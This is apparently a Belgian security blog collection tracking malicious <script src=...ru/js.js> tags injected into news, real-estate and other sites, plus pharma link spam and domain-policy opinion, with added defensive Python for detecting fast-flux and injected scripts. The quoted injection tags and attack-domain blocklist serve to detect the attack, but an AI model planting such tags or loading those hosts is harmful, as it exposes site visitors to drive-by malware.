• Some Belgian real-estate sites infected with Russian scripts

    Request information - Lo-Immo

    Lochristi<script src=http://vbs.webserivcezub.ru/js.js></script>. Nice semi-detached house with 3 spacious bedrooms and a commercial space on 580 m² ...

    Huyzentruyt<script src=http://vbs.webserivcezub.ru/js.js></script>

    Woningbouw Huyzentruyt N.V.; Wagenaarstraat 33; B-8791 Waregem - Beveren-Leie. tel. 056/736 736; fax 056/718 517; happy@huyzentruyt.be ...

    apartment - Immo Nele Tassaert | Also sells your property!

    NEW Kortrijk<script src=http://vbs.webserivcezub.ru/js.js></script> - Spacious 3-bedroom apartment (120 m²) on the Grote Markt ...


    Residentie Clovis<script src=http://vbs.webserivcezub.ru/js.js></script> ... Vendelstraat<script src=http://vbs.webserivcezub.ru/js.js></script> ...

    mmotion | Very well located duplex apartment

    Address: Stasegemdorp 79, 8530<script src=http://vbs.webserivcezub.ru/js.js></script> Harelbeke<script src=http://vbs.webserivcezub.ru/js.js></script> ...


    and so on and so on. In every hit the tag sits directly behind a piece of the page's own content (a town name, a postcode, a street name), not in the page header where a site's own scripts normally live.
  • Flair.be infected with Russian malware redirect script

    What about the right to privacy in student digs? | Flair

    5 Oct 2009 ... Legally<script src=http://apps.webservicesbba.ru/js.js></script><script src=http://ide.webserviceftp.ru/js.js></script><script ...

    www.flair.be › Home › Sex & Relationships › Helpdesk - Cached

    Links | Libelle

    Sub-category: Recipes<script src=http://apps.webservicesbba.ru/js.js></script>
    <script src=http://ide.webserviceftp.ru/js.js></script><script ...

    In a flash I suddenly felt aggressive towards her! | Flair
    Psycho<script src=http://apps.webservicesbba.ru/js.js></script><script src=http://ide.webserviceftp.ru/js.js></script><script ...
    www.flair.be › Home › Sex & Relationships › Helpdesk - Cached

    Links - Page 2 | Libelle
    Sub-category: Accommodation Europe<script src=http://apps.webservicesbba.ru/js.js></script><script src=http://ide.webserviceftp.ru/js.js></script><script ...
    www.femmesdaujourdhui.be/.../showtime_links.html?... - Cached

    and some others

    Don't just clean it up: shut it down and close it off until it is fixed.

    According to Google's diagnostic page, visitors will be presented with:
    Malicious software includes 5339 scripting exploit(s), 1 exploit(s).

    A few hundred websites are already infected
  • Humo.be and others infected with another redirect to a Russian attack server

    So we have changed the Google dork to the following search term, which seems to catch a lot of these scripts: ru/js.js>

    For Belgium it became clear that some of the infected sites are of some importance (and no longer have enough security).

    Humo's Rock Rally 2010 - The Mojo Filters | Humo: The Wild Site

    Semi-final<script src=http://apps.webservicesbba.ru/js.js></script>: Petrol Antwerpen<script src=http://apps.webservicesbba.ru/js.js></script><script ...
    www.humo.be/tws/.../the-mojo-filters.html - Cached - Similar

    1. Humo's Rock Rally 2010 - Amatorski | Humo: The Wild Site

      Semi-final<script src=http://apps.webservicesbba.ru/js.js></script>: Vooruit Gent<script src=http://apps.webservicesbba.ru/js.js></script><script ...
      www.humo.be/tws/rock.../amatorski.html - Cached - Similar
    2. Humo's Rock Rally 2010 - Gloria | Humo: The Wild Site

      Rock<script src=http://apps.webservicesbba.ru/js.js></script>. Ghent. Home Profile Audio Photos Videos. Listen to songs by Gloria. Final: Loser ...
      www.humo.be/tws/rock-rally-2010/.../boatenggloria.html - Cached
    3. Humo's Rock Rally 2010 - PSYCHO 44 | Humo: The Wild Site

      Semi-final<script src=http://apps.webservicesbba.ru/js.js></script>: Petrol Antwerpen<script src=http://apps.webservicesbba.ru/js.js></script><script ...
      www.humo.be/tws/rock.../psycho-44.html - Cached - Similar
    4. Humo's Rock Rally 2010 - Nele Needs A Holiday | Humo: The Wild Site

      Rock<script src=http://apps.webservicesbba.ru/js.js></script>. Ghent. Home Profile Audio Photos Videos. Listen to songs by Nele Needs A Holiday ...
      www.humo.be/tws/rock-rally.../nele-needs-a-holiday.html - Cached
    5. Inbox | Humo: The Wild Site

      23 June 2010 ... Toyota keeps looking for the cause of the accelerator pedal problem Fotostrips<script src=http://apps.webservicesbba.ru/js.js></script> | FPA ...
      www.humo.be/.../fotostrips%3Cscript-srchttpappswebservicesbbarujsjs%3E%3Cscript%3E.html - Cached

    If this continues, Humo.be will find itself blocked by Google: there goes your traffic, your ad income, your reputation and your web project.....

    Look at the last result: the tag appears URL-encoded in the page address itself (fotostrips%3Cscript-src...%3E.html), so it was sitting in the stored title from which the CMS built the URL, not just in a template file. Cleaning template files alone will not remove it.

    Security is quality and there is no quality without security.

    The website that visitors are being sent to is another Russian malware attack site.

    Visitors will be confronted with 3318 scripting exploit(s), 1 exploit(s).

    It is not fast-flux and has only infected 179 sites so far.


  • why block postfolkovs.ru and clean up the infections

    According to Google's badware analysis,

    the site uses 5261 scripting exploits against visitors, 467 real exploits and 3 trojans. This is like a Metasploit attack.

    It hosts other malware on the following Indian sites: giaamusic.in/, korvet.in/.

    But it is in fact part of a fast-flux botnet: Google found it hosted on 164 networks.

    Up to today it has infected at least 2311 websites in the last 90 days.
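Google's note that the attack site is "hosted on 164 networks" is what fast-flux looks like from the outside. As an added example (not code from this blog or from Google), the Python below applies the same idea to a DNS resolution log: for each name it counts the distinct A records and the distinct /16 prefixes handed out across repeated lookups and checks the TTL, and it flags a name only when many addresses, many networks and short TTLs coincide. The log, the names and the thresholds are constructed for the demonstration, the /16 prefix is a stand-in for the ASN lookup a real check would use, and a content-delivery pool with a short TTL but a single network is included to show that a low TTL on its own does not trip the check.

```python
"""Fast-flux heuristic over a DNS resolution log.

Added example, not code from the post. SAMPLE_LOG is constructed; the
addresses are from documentation/benchmark ranges, not real hosts, and the
thresholds below are assumptions for the demonstration.
"""
from collections import defaultdict
from ipaddress import ip_network

# Constructed sample: (name, seconds since first lookup, TTL, A records returned).
SAMPLE_LOG = [
    ("crypt.flux.example", 0,   300, ["203.0.113.5", "198.51.100.9", "100.64.7.21"]),
    ("crypt.flux.example", 300, 300, ["203.0.113.41", "198.18.4.9", "192.0.2.77"]),
    ("crypt.flux.example", 600, 300, ["198.51.100.200", "100.64.33.2", "192.0.2.12"]),
    ("crypt.flux.example", 900, 300, ["203.0.113.5", "198.18.250.1", "192.0.2.190"]),
    ("www.static.example", 0,   86400, ["203.0.113.10"]),
    ("www.static.example", 300, 86400, ["203.0.113.10"]),
    ("www.static.example", 600, 86400, ["203.0.113.10"]),
    ("cdn.pool.example", 0,   60, ["203.0.113.20", "203.0.113.21"]),
    ("cdn.pool.example", 60,  60, ["203.0.113.22", "203.0.113.23"]),
    ("cdn.pool.example", 120, 60, ["203.0.113.20", "203.0.113.22"]),
]

# Assumed thresholds. The /16 prefix stands in for the ASN a real check would use.
MIN_UNIQUE_IPS = 5
MIN_PREFIXES = 3
MAX_TTL = 3600


def summarize(log):
    """Per-name metrics and a verdict. Returns {name: {...}}."""
    lookups = defaultdict(list)
    for name, _ts, ttl, ips in log:
        lookups[name].append((ttl, ips))

    report = {}
    for name, entries in lookups.items():
        unique_ips = set()
        prefixes = set()
        for _ttl, ips in entries:
            for ip in ips:
                unique_ips.add(ip)
                prefixes.add(str(ip_network(ip + "/16", strict=False)))
        per_lookup = sum(len(ips) for _ttl, ips in entries) / len(entries)
        min_ttl = min(ttl for ttl, _ips in entries)
        # fluxiness > 1 means the answer set changes between lookups
        fluxiness = len(unique_ips) / per_lookup
        is_flux = (len(unique_ips) >= MIN_UNIQUE_IPS
                   and len(prefixes) >= MIN_PREFIXES
                   and min_ttl <= MAX_TTL)
        report[name] = {
            "unique_ips": len(unique_ips),
            "prefixes": len(prefixes),
            "fluxiness": round(fluxiness, 2),
            "min_ttl": min_ttl,
            "verdict": "fast-flux" if is_flux else "not fast-flux",
        }
    return report


if __name__ == "__main__":
    for name, metrics in summarize(SAMPLE_LOG).items():
        print(name, metrics)
```

Feed it your resolver's query log (name, time, TTL, answers) instead of SAMPLE_LOG; what matters is repeating the lookup over a window longer than the TTL, since a single lookup of a flux name looks like any round-robin record.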



  • some Belgian sites infected with a Russian redirect script

    According to Google, the scripts that redirect visitors to this Russian site are found in about 1700 pages on some tens of Belgian sites.

    Google search: postfolkovs.ru/js.js

    some examples

    Sioen Industries - Financial calendar<script src=http://batch ...

    Wednesday, 31 March 2010. Announcement of 2009 annual results; Thursday, 29 April 2010. Trading update 1st quarter 2010; Friday, 30 April 2010 ...


    Sitemap<script src=http://id.postfolkovs.ru/js.js></script>

    This site may harm your computer.
    Fitnessexperts is the ideal partner for home fitness equipment, home trainer, Fitnessworld, cheap fitness equipment, cross trainer, Dunlop crosstrainer ...


    some other sites are






  • another 400 websites with an injected script to a Russian site, but not clear why

    nicio<script src=http://crypt.postfolkovs.ru/js.js></script ...

    Maribel Martinez Diaz, Home, menopause, July, gynecology, gynecologist (f), woman, gynecologist (m), adolescent, treatment.

    But many other subdomains are also used, so it is better to block the whole domain:

    postfolkovs.ru (use it also as a search term)

    For the moment nothing malicious is being found in the scripts, but why send all that traffic to this site if nothing is going to happen? Or are they just waiting to see what will happen?

    There are about 400 sites and 74,000 pages for the moment, and Google blocks some of them as dangerous, but NOT ALL of them.

    One should block the domain. Whatever js.js returns today, the file lives on the attacker's server and can be swapped for an exploit loader at any moment; the injected tag is the hook, the payload can come later.

  • injecting search terms (pharma, porn) on sites to fool search engines

    If you can hack sites and plant stupid comments about Israel, non-Muslims, Kurds and the US, for starters, then you can do the same to plant search terms that push your sites or ads up in the search engines.

    This has to be done on normal sites that otherwise have no reputation problem, so that the search engine indexes the links and search terms as normal content.

    This means that schools, arts sites, sports clubs, personal sites and so on are the prime targets for this kind of insertion attack.


    Typing site:.be "canadian healthcare" into Google brings up some sites that have nothing to do with illicit pharmacies or healthcare.

    for example

    purchase real name brand viagra ordering viagra online viagra with ...

    canadian healthcare propecia · cialis viagra online · get viagra without prescription · cheap propecia professional · buy viagra online usa ...
    www.gifant.be/ - Cached

    It is a normal website for a small art festival, but on the front page somebody injected a long list of links like

    cheapest line viagra
    viagra cost
    viagra for sale on the internet
    buy cialis without prescription
    canada viagra sales
    viagra online
    propecia for sale
    sale of viagra
    generic viagra online
    viagra kamagra cheap
    cialic canada
    cialis daily cost
    viagra uk
    cialis soft tabs online
    generic meltabs viagra
    low cost viagra
    where to buy propecia
    buy propecia
    cialis for sale
    discount cialis
    viagra for sale online
    viagra in uk
    viagra overnight delivery
    online pharmacy
    buying viagra in canada
    cialis professional
    to buy cialis
    order status viagra
    sale uk viagra

    that all point, without much doubt, to another domain extension: .edu
    http://www.iab.uaf.edu/test.php?p=generic-meltabs-viagra  (already cleaned)

    You really have no security without quality and no quality without security.

    There is an enormous list of examples.
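Both kinds of injection on this page, the `<script src=http://...ru/js.js></script>` tags sprayed through the real-estate, Flair and Humo pages above and the pharma link list on the art-festival front page, can be found with the same pass over the HTML. As an added example (not code from this blog), the Python below parses a page with the standard library, reports any external script whose host is on a blocklist of the domains named in these posts or matches the `ru/js.js` pattern behind the Google dork, and reports link stuffing when five or more anchors carry pharma keywords. The sample pages, the hostnames ending in .example, the keyword list and the threshold are constructed for the demonstration.

```python
"""Scan HTML for injected script tags and pharma link stuffing.

Added example, not code from the blog. BLOCKED_DOMAINS lists the hosts named
in the posts above; the .example hostnames, sample pages, keyword list and
threshold are constructed for the demonstration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts seen injected in the posts above; subdomains (id., crypt., apps.) match too.
BLOCKED_DOMAINS = ("postfolkovs.ru", "webservicesbba.ru", "webserviceftp.ru", "webserivcezub.ru")
# The family behind the dork "ru/js.js>": any .ru host serving /js.js (assumption).
SUSPICIOUS_SRC = re.compile(r"^https?://[^/]+\.ru/js\.js$", re.IGNORECASE)
# Keywords and anchor-count threshold for link stuffing (assumptions).
PHARMA_WORDS = ("viagra", "cialis", "propecia", "kamagra", "pharmacy", "tadalafil")
STUFFING_THRESHOLD = 5


class InjectionScanner(HTMLParser):
    """Collect external script sources and (href, text) for every anchor."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.anchors = []
        self._anchor = None  # [href, text] while inside an <a>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script" and attrs.get("src"):
            self.scripts.append(attrs["src"])
        elif tag == "a":
            self._anchor = [attrs.get("href") or "", ""]

    def handle_data(self, data):
        if self._anchor is not None:
            self._anchor[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._anchor is not None:
            href, text = self._anchor
            self.anchors.append((href, " ".join(text.split())))
            self._anchor = None


def is_blocked_host(host):
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in BLOCKED_DOMAINS)


def scan(html, page_host):
    """Return [(finding_type, detail), ...] for one page."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.scripts:
        if is_blocked_host(urlparse(src).hostname) or SUSPICIOUS_SRC.match(src):
            findings.append(("injected-script", src))
    spam = [(href, text) for href, text in parser.anchors
            if any(word in text.lower() for word in PHARMA_WORDS)]
    if len(spam) >= STUFFING_THRESHOLD:
        targets = sorted({urlparse(href).hostname for href, _ in spam} - {None, page_host})
        findings.append(("link-stuffing",
                         f"{len(spam)} pharma anchors pointing to {', '.join(targets)}"))
    return findings


# Constructed sample pages (not real site content).
REALESTATE_PAGE = (
    "<html><body><h1>Lochristi<script src=http://vbs.webserivcezub.ru/js.js></script></h1>"
    "<p>Semi-detached house, 3 bedrooms.</p>"
    '<script src="https://cdn.legit.example/app.js"></script></body></html>'
)
SPAM_TERMS = ["cheapest line viagra", "viagra cost", "buy cialis without prescription",
              "propecia for sale", "generic viagra online", "cialis daily cost"]
ARTFESTIVAL_PAGE = "<html><body><h1>Art festival</h1><ul>" + "".join(
    f'<li><a href="http://spam-target.example/test.php?p={t.replace(" ", "-")}">{t}</a></li>'
    for t in SPAM_TERMS
) + '</ul><a href="/program">Program</a></body></html>'
CLEAN_PAGE = '<html><body><a href="/about">About</a><script src="/static/site.js"></script></body></html>'

if __name__ == "__main__":
    for host, page in [("www.lo-immo.example", REALESTATE_PAGE),
                       ("artfestival.example", ARTFESTIVAL_PAGE),
                       ("www.clean.example", CLEAN_PAGE)]:
        print(host, scan(page, host))
```

Run it over a crawl of your own site (or a Google cache copy); unquoted `src=` attributes, which is how the injected tags appear, parse fine. The blocklist only catches what has already been seen, the pattern catches the family, and the link-stuffing check is the one that would have flagged the art-festival page, where nothing is loaded from outside at all.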

  • dns.be in 2009: don't talk about problems please

    DNS.be has published its yearly review of its numbers, padded with some pseudo-research to fill the pages. For the rest it is just self-congratulation and a publicity product, and for these reasons it is NOT a yearly review.

    It did not mention, for starters, that .be was the victim of a fast-flux attack at the beginning of the year (discovered here) and that it took some time to solve that problem.

    It is also a bit easy to say that DNS.be will lower the price (from 20 euros to 2.5 for the registrar-resellers) each time it can, and that this won't affect quality and security, which are mentioned here and there as publicity. It just doesn't add up. You can't say that you don't have the people for monitoring and fast response to fast-flux and other attacks and at the same time lower the price of your prime product time and time again.

    DNS.be is NOT an organisation for resellers. If they want to lower the price again and again, then they should form a lobby group. DNS.be is responsible for the whole .be domain, which for the most part is owned by Belgians. They are responsible for the economic and other impact .be can have if something goes wrong.

    Like being mentioned among the top 5 (or top 3) phishing domain extensions (also not mentioned there).

    They have a strategic committee that doesn't write its own part of the report and that is more concerned about its looks than its ideas.

    So yes, I think that the .be domain will have to become more expensive if it is to better protect its domain zone and follow up on the incidents that are bound to happen when you have more than 1 million domain names to look after. And even if the registrars are protesting, they are only part of the community, they are only one of the stakeholders.

    But in dns.be they seem to be the only one sitting at the table and influencing the decisions.

  • the pseudo-science of the WHOIS study by NORC for ICANN

    For several years there have been complaints and studies saying that the WHOIS system (who is responsible for a given domain) is highly inaccurate, even false, and that this carries certain dangers.

    So NORC did a sample study for ICANN, but it is so limited in scope that it is not worth the paper it is written on:

    * it concentrates on the .com domain (75%)

    * more than 75% of the registrants are, according to their WHOIS, in the US

    * the number of domains tested is about 1400 (for the same money you could automatically test thousands of email addresses, as that is the one field that is always used even when all the rest is false or incorrect).

    So statistically this is so limited in scope that it doesn't mean a thing. If you want to prove that the WHOIS of all the gTLDs has a high percentage of mistakes or false addresses, your sample will have to be much greater.

    The problem is that nobody is saying this.

    The three biggest problems with the present WHOIS are

    * that you have to have the correct name and address, and even the email, of the people responsible for the technical side of things if the site gets hacked or attacked

    * that business domains need to have a real business address, just as in the offline world

    * that criminal online businesses hide their addresses or aren't contactable, which makes any judicial procedure more difficult

    Of course, if you make a study about such a big zone (and even then find a high percentage of faults and non-contactable domains), you can't give practical solutions, because the impact, and thus the investment, would be too great, even when there is no logical or business reason for that.

    * when one says that it would cost more if the registrar had to check each WHOIS address against the credit card, then that would be totally normal for a business site. And for a higher price such a site could carry a certified-WHOIS logo.

    And if one says that the WHOIS databases of the different registrars are all different, that one central database and WHOIS would be needed, and that this would cost enormous sums, then one can be assured that this would be totally logical for business sites that are certified.

    Another reason for this is that online business is built upon reputation. Everything you can do online can be spoofed. The only things you can trust a bit are the certification services (if they are secure enough). The WHOIS system needs a certification service. It can even be used as a privacy service for certain details of the contact information.

    * when one says that it will take a lot of effort to track down most of the users with mistakes in their WHOIS, one can respond that this effort is only necessary when there is a real problem with the site that calls for such urgency.

    For the moment the internet is still in the land-grab mentality and, just as in the Wild West, there are no clear laws and boundaries. It is time to start setting up a system that determines clear and distinct legal ownership of the virtual estates one holds. It is not certain that this registration will stay as cheap as it is, and maybe a general certification tax on all new domains would help fund the certification services, but there is no business reason why virtual domains should be that cheap. They are not Coca-Cola for immediate consumption, but investments in virtual real estate and property. The cost shouldn't be 100 times higher, but a 10% increase would already make a big difference.

    This is only possible if a system is set up that would protect global brands across the domainname system from being hijacked.

  • brand managers will go to court instead of to alternative dispute mechanisms

    In the beginning there was the saying that the internet was not made for the geographical judicial system and that it was too complicated to make an international internet court system.

    So, with the community thinking and the new-world ideology, several kinds of alternative dispute mechanisms (the UDRP) were set up, also in Belgium.

    For brand managers it is clear that these have failed and are doomed in their present form, for several reasons.

    They cost a lot of time and money, even though many of their decisions could, based on precedent, be automated. If you have decided that any domain name with "disney" in it is a brand name and needs Disney's approval first, then any further dispute about the same brand name should take a few minutes.

    Secondly, contrary to the judicial system, the UDRP dispute mechanism doesn't take its individual decisions to a higher level. If you have taken tens of decisions, those should be the basis for new rules that are integrated into the contracts. As long as they are purely individual decisions you can use a UDRP, but after some time you should prevent the same thing from happening all over again.

    Otherwise you are in the stupid situation that the registrar keeps adding new domain names that are totally illegal if one abides by the decisions of the UDRP. And you can't expect brand managers to go to the UDRP for each repetitive cheap domain name that is nearly exactly the one they got taken down the month or even the day before.

    This looks a bit like the oil spill....

    Thirdly, there is no effective punishment that scares the other parties (if their WHOIS is correct and if they are even contactable) and raises the risk for them.

    So yes, you should go to court and sue them for everything they have, and sue those that have helped them to register, host and build the services and get paid. They should also know there is a risk.

    And yes, this costs money. And yes, this will take some time. But after all, it will be LAW. Real LAW.

    And as the online world is becoming less the Wild West and every year more a normal business environment, businesses and people are turning to something they can really trust, and that is REAL LAW.

    Why am I saying this? Because I believe that after the trial that Verizon, Yahoo and others won against eNom it is clear that the UDRP process was flawed from the beginning, because it didn't make 'community' law that was used as such, and that if the internet is to be trusted one day it will need laws. And as the community model didn't work and didn't produce such laws, the centuries-old way of making law will have to start doing so. For better and for worse, but there is no alternative.

  • when is a domain registrar too big to fail, even if courts decide as such

    Some big domain registrars are playing with fire and, just like the banks and the investors before the crisis, are only looking at the short term and the easy criminal money. They are helping online illicit pharmacies to hide from prosecution and are being paid for the whole back-office (payment) processing that those services need to function.

    When smaller ISPs, hosters or registrars are dismantled or disconnected because they are infiltrated or used by online and offline criminal businesses, the rest of the internet can take care of the domain transfers and the hosting of the legitimate businesses.

    The involvement of one of the internet's biggest domain registrars in helping and supporting illicit pharmacies can have big implications if a single judge in the US decides to convict for it and declares the operation criminal. It is not possible to transfer that many domain names at the present time. Even KnujOn.com says that the involvement of eNom firms and services in this (under US law) criminal online activity carries enormous risks for the whole internet as we know it.

    If we stay with the comparison with the banking sector, we as a community will have to make the following decision.

    Either we accept that the 5 biggest registrar services are turning the domain business into a collective monopoly, and we regulate them more strictly than the others because of that systemic risk.

    Or we take steps to break them up or liberalise the market even more, maybe by limiting the number of domain extensions one may sell or the number of affiliates one may have, just as we have done in several other industries.

    I think that if this choice is put before them, in the end their choice will be the first.

  • dny.no-ip.be used as hosting for illicit pharmacies and more

    The site gives you free subdomains, nearly free hosting and stuff like that.

    You can set up as many pages as you would like,

    so the spammers did.

    Type site:dny.no-ip.be

    and next to it viagra, cialis, porn, free movies or whatever, and you will get it.

    The domain name is Belgian and it redirects to a French domain that is clearly established under French law and will probably listen to this kind of complaint from administrative or legal services or from the brand-name holders.

  • how legal is a European private online hospital

    This is part of an international network of sites and operators run out of Switzerland. They give the impression of being medical and responsible and say that they work with doctors and questionnaires, but how can you make a real professional judgement if you don't see, touch and examine your patient?

    OK, some medications in Europe are sold over the counter in one country and only on prescription in another (and their composition may not be the same).

    On their Belgian FAQ page they say that it is up to the patient to research whether it is legal for them to buy those drugs. This is the world turned on its head. It is up to the operator to make sure that he or she has the legal capacity to sell those things online in the country the drugs are being sent to.

    It is rather ridiculous to have all kinds of websites (even bigger ones) refusing to ship blank DVDs to Belgium because of our law on copyright levies, while at the same time illegal private hospitals are illegally playing online doctor and pharmacy in our country.

    Nobody will be harmed by a package of blank DVD-Rs, but they sure will be by an overdose of, or badly taken, drugs.

    http://www.121doc.be/faqs_all.html (last question)

  • another domain extension to block and forget about: .su

    Since the disintegration of the Soviet Union in 1991 this domain extension has been through all the steps of the termination and transfer process, but nobody has dared to pull the plug effectively, as they did with .yu for Yugoslavia and several others.

    There is some talk about community and other historical stuff, but a local domain extension is linked to a country or region with a political authority the community can call upon if things get out of hand with their domain extension.

    The .su domain extension is for the moment being sold by Americans,

    and if you Google some terms like cialis, porn or hacking with site:.su, you will find enough reasons to just forget about it.

    You will find such sites on any domain extension, but this one is without any doubt one of the domain extensions for which NO government is responsible.

    Otherwise they should apply under the new generic TLD system and pay like all the others.

  • Google gets rich with ads for illicit pharmacies

    So we typed cialis into Google, looking for bad .name sites.

    To our astonishment, Google also gave us this, knowing that we are in Belgium and that Belgium has a very strict law on the sale and promotion of medicines:

    C l A L I S France
    Low prices
    Different payment methods

    Order CialisOnline
    Get harder and faster erections.
    Buy 2 & get 1 bottle free!

    2OmgCialis 1OOmgViaqra
    2OmgCialis - 1Opills - 39.95
    1OOmgViaqra - 1Opills - 35.95

    C l A L I S
    1Omg - 1.2OEUR :. 2Omg - 1.25EUR.
    VlSA, MC, JCB. 365/24/7

    GenericClALlS Є1.27 PerPills

    GenericClALlS 1.33 PerPills
    Fast European delivery

    GenericClALlS in Europe
    Most popular quantity 20mgx20pills
    Price Є54.69. TadalafilGroup.

    Note the spelling tricks in these ads: a letter O in place of a zero (1Omg, 2OmgCialis, 1.2OEUR), a lowercase l in place of a capital I (ClALlS, VlSA) and a q in place of a g (Viaqra). The text still reads as the brand name to a person but no longer matches it as a string, which is how it slips past a keyword filter.

    I think it is time to consider that those legitimate firms are also making much of their money promoting illegal businesses. I think that if our traditional online media did this, they would be prosecuted.

  • .name domain extension hijacked by criminals

    The .name domain extension was approved by ICANN because it would give individuals the possibility to have their own domain name, something personal, and some hype was built around it (personal networks, social media and all that crap).

    It seems that the domain extension is now heavily used by criminals to sell illicit drugs (pharmacies)


    and look at this one (directnic)


    but there is worse, which is the reason that the whole .name domain extension is becoming something to worry about, or just to blacklist as such until it dies a natural death:

    * there is no real WHOIS

    * the sites are also being used as nameservers for other sites with other domain extensions, and as such are shielding those illegal sites from public view (note that blocking .name in a web proxy does nothing against this use: a nameserver in .name is reached by your resolver, not by your browser, so the block has to be in DNS)

    an example is this site


    and when you click it, you arrive here: http://www.bmpharmacy.com

    And if you really want some other stuff, after you have taken all that fake viagra and didn't get sick afterwards, you type this in for .name


    So blocking .name seems like a good idea. Who needs it anyway? Would you have a .name domain in that kind of neighbourhood?

  • some things about the church pedophile cases in Belgium

    The Belgian Catholic Church established an internal commission to handle the complaints about pedophiles in the Belgian Church.

    The problem with this commission is that its main mission was to keep the cases closed off from the public.

    For example, in 100 of the 500 cases the complainants asked this internal commission to transfer their files to the justice department, but it has only transferred 2 so far.

    When it became clear that a crucial meeting was taking place at which the hierarchy of the Belgian Catholic Church could decide to destroy all the files about older pedophile cases, the justice department decided to take everything into custody, in an operation the representative of the Vatican called 'worse than being convicted as a pedophile' and 'worse than under communism'.

    But the internal law of the Catholic Church isn't public law, and things like abusing kids can't be handled by internal canon law; because of their gravity they are always a matter of public law. It is not enough that the sole punishment for those priests and bishops is being sent to a faraway country, and that the victims receive some small amounts of money to shut up.

    You also have to take into consideration that since the Dutroux period many people thought that the police and the justice department were protecting people in high positions. You can assume that the judge didn't want to give the impression that this would be the case here. If they had allowed the Church to bury 400 files about possible pedophile cases and accepted that they didn't receive the 98 other cases that should have been transferred to them anyway, the justice department wouldn't have any credibility left. The damage to its reputation would have been enormous, especially towards the victims and their families, who would have the feeling that there was no justice anywhere (not in the Church and not in the courts) and that nobody was respecting their wishes.

    Another remark is that the police confiscated all the computers and that there was no backup, so all administrative operations are now at a standstill. It is not clear when these computers will be returned. Seizure of the hardware is one more scenario an off-site backup has to cover; without one, the organisation is down for as long as the investigation lasts.

    to be continued

  • Microsoft updates and planning

    After Microsoft put some order into its stream of security updates and organised them to be released on the second Tuesday of the month, it now seems that more updates are coming our way, although these are purely functional.

    At the Internet Storm Center they have the impression that those updates are released on the fourth Tuesday of the month, if there are any.

    For bigger networks this can be a hassle: now that you have organised your patch testing and process around one run every month, it now seems that it could be every 2 weeks. This takes away some of the advantages of the process that made it an example for the rest of the industry.

    It would be a better idea to release those patches on the second Tuesday of the month as well, but maybe in different packages that can be distributed at different times throughout the enterprise.

    Also because, while we are testing the impact of the security patches, we ought to test the possible impact of the functional patches too. This month the patches are for the .NET Framework. This wouldn't be a problem if the programmer hadn't messed with the application and had left everything more or less standard, but you know that is seldom the case.
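The scheduling conflict described above can be made concrete. As an added example (not code from this blog or from Microsoft), the Python below builds a year's patch calendar: the security release on the second Tuesday, the functional release on the fourth Tuesday as the Internet Storm Center observed, and the internal test and deployment deadlines derived from the security date. The seven- and fourteen-day lags are assumptions; the fourth Tuesday is always exactly fourteen days after the second, so with a two-week deployment window the functional release lands on the very day the security rollout is due to finish.

```python
"""Patch-window calendar for the two Microsoft release days discussed above.

Added example, not code from the blog or from Microsoft. The second-Tuesday
security release is Microsoft's published schedule; the fourth-Tuesday
functional release is the Internet Storm Center observation quoted in the post.
The test and deployment lags are assumptions.
"""
import datetime as dt

TUESDAY = 1  # date.weekday(): Monday is 0


def nth_weekday(year, month, weekday, n):
    """Date of the n-th given weekday in the month, or None if there is no such day."""
    first = dt.date(year, month, 1)
    day = 1 + (weekday - first.weekday()) % 7 + 7 * (n - 1)
    try:
        return dt.date(year, month, day)
    except ValueError:  # a fifth occurrence that the month does not have
        return None


def patch_windows(year, test_days=7, deploy_days=14):
    """One row per month: both release dates plus the deadlines derived from the security date."""
    rows = []
    for month in range(1, 13):
        security = nth_weekday(year, month, TUESDAY, 2)
        functional = nth_weekday(year, month, TUESDAY, 4)  # always exists (day <= 28)
        deploy_deadline = security + dt.timedelta(days=deploy_days)
        rows.append({
            "month": month,
            "security_release": security,
            "functional_release": functional,
            "test_complete_by": security + dt.timedelta(days=test_days),
            "deploy_complete_by": deploy_deadline,
            # True when the functional release arrives before the security rollout is finished
            "collides": functional <= deploy_deadline,
        })
    return rows


if __name__ == "__main__":
    for row in patch_windows(2010):
        print(f"{row['month']:2d}  security {row['security_release']}  "
              f"functional {row['functional_release']}  collides={row['collides']}")
```

Shortening the deployment window to thirteen days is the only way the two streams stop colliding on this calendar, which is why the post's suggestion of shipping both on the second Tuesday in separate packages is the more realistic fix.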

  • Tucows steals expired domain names before anyone else

    While there is no evidence that Tucows engages in front running, they do own Yummy Names, a portfolio of "tens of thousands of names." Many of these domains were originally registered by Tucows customers, but were not renewed.

    Go Daddy is the world's largest domain name registrar, yet maintains one of the lowest ratios of refunded domain names of any large registrar. Unlike some of its competitors, Go Daddy does not participate in domain name investing nor does it "own" domain names, apart from those legitimately needed for online commerce.

    This means you shouldn't keep your domain names with such a service: if you have an administrative failure at renewal, you have not only lost the name, you also can't get it back at a normal price.

  • Somalia will have a domainextension

    How does this failed country get a domain extension, and who will control it, or change control?

    The official government, which is only holding out in a few blocks of the capital, or the Al-Qaeda-linked gangs and pirates holding on to the rest of the country, with maybe some local warlord keeping control of some routes or villages for a while?

    How can a totally failed state be an official domain extension on the internet? You never know who you are dealing with, for how long, and under what circumstances.